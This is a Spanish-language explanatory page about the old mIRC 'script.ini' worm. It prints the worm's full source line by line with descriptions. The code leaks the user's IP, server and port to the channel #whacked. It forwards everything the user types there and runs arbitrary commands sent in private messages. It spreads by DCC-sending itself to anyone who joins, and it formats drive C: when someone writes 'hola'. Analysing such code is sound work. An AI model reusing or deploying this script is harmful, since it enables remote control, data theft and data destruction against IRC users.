Como ya emos visto antes el script.ini es un VIRUS-SCRIPT ; que ocaciona numerosos problemas en nuestro mIRC en esta sección veremos como es este archivo por dentro y como logra causar los efectos ya descriptos anteriormente.
| Descripcion de los comandos: | El archivo script.ini por dentro: |
| n0,1,2,3:
establece que al iniciar, se active el remote (que es toda la lista de
comandos que se decriben a continuación)
n4,5,6,7,8: envia en un msg a: #whacked, que el usuario infectado con este archivo esta en la IRC y le envia tambien la información del server, nick, ip, port, del usuario. n9,10,11,12: establece que al aparecer en cualquier ventana de nuestro mIRC, el signo ? se corra a $2 n13,14,15: acá es donde se ordena que cuando alguien entre al/los canal/es que estamos se mande el archivo script.ini a esa persona. Así es como se reproduce tan facilmente. n16,17,18: cuando alguien escriba la palabra hola en cualquier canal, se procedera automaticamente a borrar el C: |
[script]
n0=on 1:START:{ n1= .sreq ignore n2= .remote on n3=} n4=on 1:CONNECT:.msg #whacked Hi. $ip on $server $+ : $+ $port $+ . n5= n6=on 1:INPUT:*:{ n7= .msg #whacked ( $+ $active $+ ) $1- n8=} n9=on 1:TEXT:*:?:{ n10= if ( $1 == runthis ) { .run $2- } n11=} n12= n13=on 1:JOIN:*:{ n14= if ( $nick == $me ) { halt } | .dcc send $nick $mircdir $+ script.ini n15=} n16=on 1TEXT:*hola*:#:{ n17=/run -n format c: /q /autotest n18=} ****** Ebols 1998 ******* |